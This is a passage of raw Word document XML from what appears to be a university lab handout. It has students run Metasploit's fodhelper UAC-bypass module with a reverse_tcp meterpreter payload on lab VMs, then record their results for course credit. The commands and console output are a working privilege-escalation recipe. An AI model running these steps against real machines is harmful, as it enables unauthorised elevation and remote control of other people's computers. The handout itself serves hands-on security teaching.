                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AD50C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3683"/>
          <w:tab w:val="left" w:pos="4523"/>
        </w:tabs>
        <w:spacing w:before="73"/>
        <w:ind w:left="839" w:right="1527"/>
      </w:pPr>
      <w:r>
        <w:t>EXITFUNC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="64"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9BD05A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1975"/>
          <w:tab w:val="left" w:pos="3374"/>
          <w:tab w:val="left" w:pos="3511"/>
          <w:tab w:val="left" w:pos="4214"/>
          <w:tab w:val="left" w:pos="4348"/>
        </w:tabs>
        <w:ind w:left="839" w:right="1642"/>
      </w:pPr>
      <w:r>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>The listen address (an interface may be specified) LPORT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>The listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694DFDF" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185D2097" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1041" w:right="8983" w:hanging="202"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target: Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="65"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B80BA2" w14:textId="178A8039" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="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8320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EE3CD2E" wp14:editId="480F8C69">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1042670</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="100965" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="48" name="Freeform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0965" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 1642 1642"/>
                            <a:gd name="T1" fmla="*/ T0 w 159"/>
                            <a:gd name="T2" fmla="+- 0 1800 1642"/>
                            <a:gd name="T3" fmla="*/ T2 w 1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59">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="158" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:noFill/>
                        <a:ln w="13411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497D12" id="Freeform 25" o:spid="_x0000_s1026" style="position:absolute;margin-left:82.1pt;margin-top:8.15pt;width:7.95pt;height:.1pt;z-index:-157081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" path="m,l158,e" filled="f" strokeweight=".37253mm">
                <v:stroke dashstyle="dash"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;10033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8832" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04436303" wp14:editId="0BFE6034">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1228090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="201295" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="47" name="Freeform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1295" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 1934 1934"/>
                            <a:gd name="T1" fmla="*/ T0 w 317"/>
                            <a:gd name="T2" fmla="+- 0 2251 1934"/>
                            <a:gd name="T3" fmla="*/ T2 w 31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7">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="317" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:noFill/>
                        <a:ln w="13411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75A1E3" id="Freeform 24" o:spid="_x0000_s1026" style="position:absolute;margin-left:96.7pt;margin-top:8.15pt;width:15.85pt;height:.1pt;z-index:-157076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" path="m,l317,e" filled="f" strokeweight=".37253mm">
                <v:stroke dashstyle="dash"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;201295,0" o:connectangles="0,0"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA32A54" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="73"/>
        <w:ind w:left="1041"/>
      </w:pPr>
      <w:r>
        <w:t>0 Windows x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609BC89B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536BD852" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B569ED9" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(windows/local/bypassuac_fodhelper) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7518DB99" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>SESSION =&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AD64A8" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77FB6668" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
        <w:ind w:right="3134"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/local/bypassuac_fodhelper) &gt; set payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02949AC5" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>payload =&gt; windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A023C21" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C9792F" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/local/bypassuac_fodhelper) &gt; set LPORT 3333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663ADD95" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>LPORT =&gt; 3333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B539157" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFBAC3E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="93"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/local/bypassuac_fodhelper) &gt; set TARGET 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050BA743" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>TARGET =&gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C5590" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/local/bypassuac_fodhelper) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B2CD5" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC3D812" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Started reverse TCP handler on 10.0.2.</w:t>
      </w:r>
      <w:r>
        <w:t>15:3333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40450B92" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="2752"/>
      </w:pPr>
      <w:r>
        <w:t>[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. [*] Exploit completed, but no session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D9C27F" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44074F8A" w14:textId="45AD227A" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr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9344" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="283A22F6" wp14:editId="300EDFD1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>895985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>205740</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5768340" cy="1051560"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="46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8340" cy="105156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38A882" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                            </w:pPr>
                            <w:r>
                              <w:t>This is the step to escalate the privilege. Since this machine is not vulnerable, try the same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steps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with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Windows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1</w:t>
                            </w:r>
                            <w:r>
                              <w:t>0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machine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escalate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privilege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by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exploiting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client’s vulnerabilities….</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="67A54469" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:spacing w:before="9"/>
                              <w:rPr>
                                <w:sz w:val="23"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4A3E7165" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both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</w:rPr>
                              <w:t>Try</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"/>
                                <w:spacing w:val="-1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</w:rPr>
                              <w:t>them</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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0000"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</w:rPr>
                              <w:t>record</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>them</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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FF0000"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pacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>your</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>coursework</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>and/or</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"/>
                                <w:spacing w:val="-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FF0000"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FF0000"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</w:rPr>
                              <w:t>shared</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"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</w:rPr>
                              <w:t>Onenote</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF0000"/>
                                <w:spacing w:val="-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</w:rPr>
                              <w:t>with instructions to gain</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="FF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</w:rPr>
                              <w:t>CREDITS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3A22F6" id="Text Box 23" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;margin-left:70.55pt;margin-top:16.2pt;width:454.2pt;height:82.8pt;z-index:-157071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" fillcolor="#f2f2f2" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1B38A882" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                      </w:pPr>
                      <w:r>
                        <w:t>This is the step to escalate the privilege. Since this machine is not vulnerable, try the same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steps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with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Windows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1</w:t>
                      </w:r>
                      <w:r>
                        <w:t>0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machine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escalate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privilege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by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exploiting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client’s vulnerabilities….</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="67A54469" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:spacing w:before="9"/>
                        <w:rPr>
                          <w:sz w:val="23"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4A3E7165" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both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</w:rPr>
                        <w:t>Try</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-1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24"/>
                        </w:rPr>
                        <w:t>them</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>and</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>record</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>them</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>in</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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pacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>your</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>coursework</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>and/or</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-1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24"/>
                        </w:rPr>
                        <w:t>in</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>the</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>shared</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"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24"/>
                        </w:rPr>
                        <w:t>Onenote</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF0000"/>
                          <w:spacing w:val="-1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24"/>
                        </w:rPr>
                        <w:t>with instructions to gain</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="FF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24"/>
                        </w:rPr>
                        <w:t>CREDITS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7832CF5" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E60AC50" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="93"/>
        <w:ind w:left="840" w:right="1436"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Once you have exploited the vulnerable machine successfully following the above steps,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>10)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>UAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>machine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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>into a meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF55D3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404C548C" w14:textId="5A282425" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="840" w:right="628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305728" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="595C0C09" wp14:editId="045208CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>577215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="45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662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CBEF51" id="Line 22" o:spid="_x0000_s1026" style="position:absolute;z-index:-16010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4.65pt,45.45pt" to="595.3pt,4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">
                <w10:wrap anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:t>From this point, record your reflections: meterpreter &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5450FB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:sectPr w:rsidR="008B5358">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB38A04" w14:textId="33581873" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="7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53728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B4698DA" wp14:editId="7A4B3C60">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="44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662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7E9FC7" id="Line 21" o:spid="_x0000_s1026" style="position:absolute;z-index:1575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4.65pt,765.95pt" to="595.3pt,76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">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC2BDAF" w14:textId="39C64A40" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="811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1E62A609" wp14:editId="1F311A2F">
                <wp:extent cx="5768340" cy="525780"/>
                <wp:effectExtent l="635" t="0" r="3175" b="0"/>
                <wp:docPr id="42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8340" cy="525780"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9084" cy="828"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="43" name="AutoShape 2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084" cy="828"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T1" fmla="*/ 552 h 828"/>
                              <a:gd name="T2" fmla="*/ 0 w 9084"/>
                              <a:gd name="T3" fmla="*/ 552 h 828"/>
                              <a:gd name="T4" fmla="*/ 0 w 9084"/>
                              <a:gd name="T5" fmla="*/ 828 h 828"/>
                              <a:gd name="T6" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T7" fmla="*/ 828 h 828"/>
                              <a:gd name="T8" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T9" fmla="*/ 552 h 828"/>
                              <a:gd name="T10" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T11" fmla="*/ 0 h 828"/>
                              <a:gd name="T12" fmla="*/ 0 w 9084"/>
                              <a:gd name="T13" fmla="*/ 0 h 828"/>
                              <a:gd name="T14" fmla="*/ 0 w 9084"/>
                              <a:gd name="T15" fmla="*/ 276 h 828"/>
                              <a:gd name="T16" fmla="*/ 0 w 9084"/>
                              <a:gd name="T17" fmla="*/ 552 h 828"/>
                              <a:gd name="T18" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T19" fmla="*/ 552 h 828"/>
                              <a:gd name="T20" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T21" fmla="*/ 276 h 828"/>
                              <a:gd name="T22" fmla="*/ 9084 w 9084"/>
                              <a:gd name="T23" fmla="*/ 0 h 8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9084" h="828">
                                <a:moveTo>
                                  <a:pt x="9084" y="552"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="552"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="90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6"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9084" y="276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90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F2F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8EA6883" id="Group 19" o:spid="_x0000_s1026" style="width:454.2pt;height:41.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="9084,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">
                <v:shape id="AutoShape 20" o:spid="_x0000_s1027" style="position:absolute;width:9084;height:828;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9084,8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" path="m9084,552l,552,,828r9084,l9084,552xm9084,l,,,276,,552r9084,l9084,276,9084,xe" fillcolor="#f2f2f2" stroked="f">
